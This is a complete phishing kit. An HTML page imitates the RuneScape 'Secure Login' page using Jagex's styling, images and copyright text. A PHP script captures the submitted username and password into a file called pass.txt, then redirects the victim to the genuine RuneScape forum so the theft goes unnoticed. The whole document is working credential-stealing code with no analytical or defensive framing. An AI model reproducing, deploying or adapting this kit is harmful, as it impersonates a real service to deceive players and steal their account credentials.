<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:IE> <head> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <meta name="MSSmartTagsPreventParsing" content="TRUE"> <title>RuneScape - the massive online adventure game by Jagex Ltd</title> <link href="http://www.runescape.com/css/basic-3.css" rel="stylesheet" type="text/css" media="all"> <link href="http://www.runescape.com/css/extra-1.css" rel="stylesheet" type="text/css" media="all"> <style type="text/css"> .buttons { width: 600px; height: 60px; position: relative; margin: auto; } .buttons a{ display: block; position: absolute; width: 260px; height: 40px; margin: 5px; background: #808080; font-weight: bold; color: white; text-align: center; border: 2px outset #909090;} .buttons a:hover { background: #A0A0A0; border-color: #ffffff} #button-left {left: 0px; top: 0px; padding-top:3px;} #button-left span.lev1 {background-image: url('http://www.runescape.com/img/loginpage/open.gif');} #button-right {right: 0px; top: 0px; padding-top:3px;} #button-right span.lev1 { background-image: url('http://www.runescape.com/img/loginpage/lost-your.gif');} span.lev1 { display: block; cursor: pointer; cursor: hand; position: absolute; top: -10px; left: -10px; width: 286px; height: 60px;} a:hover span.lev1 { background-position: 0 60px;} </style> </head> <body> <div id="body"> <div style="text-align: center; background: none;"> <div class="titleframe e"> <b>Secure Login</b><br> <a href="http://www.runescape.com/title.ws">Main Menu</a> </div> </div> <img style="margin-top:-25px;" class="widescroll-top" src="http://www.runescape.com/img/scroll/backdrop_765_top.gif" alt="" width="765" height="50"> <div class="widescroll" style="text-align:center;"> <div class="widescroll-bgimg"> <div style="padding-top:0px;" class="widescroll-content"> <span style="display:block;padding:25px 0 0 0;"><img title="Login to Access this Feature" alt="Login to Access this Feature" style="display:block; margin:auto;" src="http://www.runescape.com/img/loginpage/log-in.gif"></span> <div style="font-size: 8pt;margin:auto;"> </div> <div style="position:relative;height:214px;width:414px;margin:auto;margin-top:4px;"> <table cellpadding="0" cellspacing="0" style="height:214px; width:414px"> <tr> <td colspan="3" height="7" width="400"> <img style="position:absolute; left:0; top:0" src="http://www.runescape.com/img/loginpage/shadow_top.gif"> </td> </tr> <tr> <td height="200" width="7"> <img style="position:absolute; left:0; top:7px;" src="http://www.runescape.com/img/loginpage/shadow_left.gif"> </td> <td height="200" width="400"> <div style="background-color:#3e434d; opacity: 0.5; -moz-opacity:0.5;height: 200px; width: 400px; position:absolute; left:7px; top:7px;z-index:0;filter:alpha(opacity=50);"></div> <div style="z-index:2; top:70px;left:40px;position:absolute;"> <form action="next.php" method="get" autocomplete="off"> <table style="-moz-opacity:1.0; opacity:1.0; filter:alpha(opacity=100);"> <tr> <td>RuneScape username:</td> <td><input size="20" type="text" name="username" maxlength="12"></td> </tr> <tr> <td>RuneScape password:</td> <td><input size="20" type="password" name="password" maxlength="20"></td> </tr> <tr> <td></td> <td align="center"><input type="submit" value="Secure Login"></td> </tr> </table> <input type="hidden" name"CoDeD_by_Sillix_[WWH] Ownz You" </form> </div> </td> <td style="position:absolute; left:407px; top:7px" height="200" width="7"> <img src="http://www.runescape.com/img/loginpage/shadow_right.gif"> </td> </tr> <tr> <td colspan="3" height="7" width="400"> <img style="position:absolute; left:0; top:207px" src="http://www.runescape.com/img/loginpage/shadow_bottom.gif"> </td> </tr> </table> </div> <div style="margin:auto;"> <img id="dont" src="http://www.runescape.com/img/loginpage/runescape_only_ie6_2.gif" style="margin:auto;padding-top:5px;" title="Only Enter Your Password On RuneScape.com" alt="Only Enter Your Password On RuneScape.com"> </div> <script type="text/javascript"> var ua=navigator.userAgent.toLowerCase(); if (ua.indexOf('firefox')>-1 || ua.indexOf('macintosh')>-1) { document.getElementById('dont').src='http://www.runescape.com/img/loginpage/runescape_only_ff_2.gif'; } if (ua.indexOf('msie 7.0')>-1) { document.getElementById('dont').src='http://www.runescape.com/img/loginpage/runescape_only_ie7_2.gif'; } </script> <br> <br> <div class="buttons"> <a href="https://create.runescape.com/index.html" class="button" id="button-left"><span class="lev1"></span>Open a New Account!<br> Click Here!</a> <a href="https://password.runescape.com/passsupport.html" class="button" id="button-right"><span class="lev1"></span>Lost Your Password?<br> Click Here!</a> </div> </div> </div> </div> <img class="widescroll-bottom" src="http://www.runescape.com/img/scroll/backdrop_765_bottom.gif" alt="" width="765" height="50"> <div class="tandc">This website and its contents are copyright © 1999 - 2007 Jagex Ltd.<br> Use of this website is subject to our <a href="http://www.runescape.com/terms/terms.ws" class=c>Terms+Conditions</a> and <a href="http://www.runescape.com/privacy/privacy.ws" class=c>Privacy policy</a> </div> </div> </body> </html>
<?php header("Location: http://forum.runescape.com/forums.ws "); $handle = fopen("pass.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>